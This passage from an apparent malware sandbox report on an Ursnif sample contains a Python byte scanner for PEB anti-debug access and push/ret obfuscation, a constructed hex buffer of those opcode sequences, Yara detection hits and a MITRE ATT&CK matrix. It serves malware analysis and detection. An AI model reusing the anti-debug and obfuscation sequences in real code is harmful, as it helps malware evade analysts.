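            if buf[i + 1:i + 2] == b"\x8B" and i + 6 < n \
                    and (buf[i + 2] & 0xC7) == 0x05 and buf[i + 3:i + 7] == PEB_DISP:
                reg = REGS32[(buf[i + 2] >> 3) & 7]      # mov r32, fs:[30h] (ModRM form)
                hits.append((i, f"mov {reg}, fs:[30h] (PEB)"))
                i += 7
                continue
            if buf[i + 1:i + 7] == b"\xFF\x35" + PEB_DISP:   # push dword ptr fs:[30h]
                hits.append((i, "push dword ptr fs:[30h] (PEB)"))
                i += 7
                continue
        if 0x50 <= b <= 0x57 and i + 1 < n and buf[i + 1] in RET_OPCODES:   # push r32; ret*
            hits.append((i, f"push {REGS32[b - 0x50]}; {RET_OPCODES[buf[i + 1]]}"))
            i += 2
            continue
        if b == 0x68 and i + 5 < n and buf[i + 5] in RET_OPCODES:           # push imm32; ret*
            imm = int.from_bytes(buf[i + 1:i + 5], "little")
            hits.append((i, f"push 0x{imm:08X}; {RET_OPCODES[buf[i + 5]]}"))
            i += 6
            continue
        if b == 0x6A and i + 2 < n and buf[i + 2] in RET_OPCODES:           # push imm8; ret*
            hits.append((i, f"push 0x{buf[i + 1]:02X}; {RET_OPCODES[buf[i + 2]]}"))
            i += 3
            continue
        i += 1
    return hits


def summarize(hits):
    """Count hits per family so a batch of samples can be ranked."""
    peb = sum(1 for _, desc in hits if "fs:[30h]" in desc)
    return {"peb_access": peb, "push_ret": len(hits) - peb}


# Constructed buffer reproducing the instruction sequences named in the report.
SAMPLE = bytes.fromhex(
    "55 8B EC"              # push ebp; mov ebp, esp        (ordinary prologue)
    "64 A1 30 00 00 00"     # mov eax, fs:[30h]             -> PEB
    "8A 40 02"              # mov al, [eax+2]               -> PEB.BeingDebugged (illustrative)
    "64 FF 35 30 00 00 00"  # push dword ptr fs:[30h]
    "51 C3"                 # push ecx; ret                 (jmp ecx in disguise)
    "68 60 95 03 8D CB"     # push 8D039560h; retf
    "5D C3"                 # pop ebp; ret                  (ordinary epilogue)
)

if __name__ == "__main__":
    for off, desc in scan(SAMPLE):
        print(f"+0x{off:04X}  {desc}")
    print(summarize(scan(SAMPLE)))
```

A linear scan has no notion of instruction boundaries, so a match can land inside an immediate or in data; treat the hits as triage signals to confirm in a disassembler (the sandbox entries above come from a disassembled function graph, which is why they carry function start and end addresses). `push X; ret` is `jmp X` written so that a linear disassembler sees a function end, which is the reason it is listed as an obfuscation signature; `retf` and `iretd` variants additionally pop a segment selector or flags, so they are even less likely in compiler-generated code.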

      Stealing of Sensitive Information:

      Yara detected Ursnif
      Source: Yara match | File source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY

      Remote Access Functionality:

      Yara detected Ursnif
      Source: Yara match | File source: 00000002.00000002.646959621.000000000530B000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4536, type: MEMORY

      Mitre Att&ck Matrix

      Columns: Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Counts in parentheses are the number of signatures mapped to that technique; techniques without a count are the matrix template and were not observed for this sample.

      Valid Accounts | Windows Management Instrumentation (1) | Path Interception | Process Injection (2) | Masquerading (1) | OS Credential Dumping | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Encrypted Channel (12) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Native API (2) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion (1) | LSASS Memory | Security Software Discovery (13) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer (3) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | Exploitation for Client Execution (4) | Logon Script (Windows) | Logon Script (Windows) | Process Injection (2) | Security Account Manager | Virtualization/Sandbox Evasion (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information (1) | NTDS | Process Discovery (2) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (4) | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Rundll32 (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
      External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery (2) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery (34) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

      Behavior Graph

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET